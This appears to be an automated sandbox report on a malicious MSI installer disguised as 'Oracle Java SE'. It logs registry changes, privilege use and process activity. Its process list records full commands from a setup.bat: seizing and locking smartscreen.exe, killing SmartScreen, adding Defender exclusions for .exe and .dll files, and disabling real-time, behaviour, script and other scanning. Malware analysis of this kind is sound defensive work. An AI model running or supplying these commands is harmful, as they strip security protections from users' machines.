Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 2656 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3712 wrote to memory of 408 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 408 wrote to memory of 3876 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\syswow64\cmd.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3096 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3476 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 5056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 3024 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1800 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2472 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 4824 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1672 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 2528 N/A C:\Windows\syswow64\cmd.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4056 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 5016 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4600 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 932 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3140 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3580 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 3460 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4556 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 4328 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 674D0B963080012894E3DF4CB73C27AF

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 30B3AA91DCE7877DF4C02F3D55173702 E Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Windows\syswow64\cmd.exe

"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"

C:\Windows\SysWOW64\takeown.exe

takeown /f "C:\Windows\System32\smartscreen.exe" /a

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /reset

C:\Windows\SysWOW64\taskkill.exe

taskkill /im smartscreen.exe /f

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Register.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

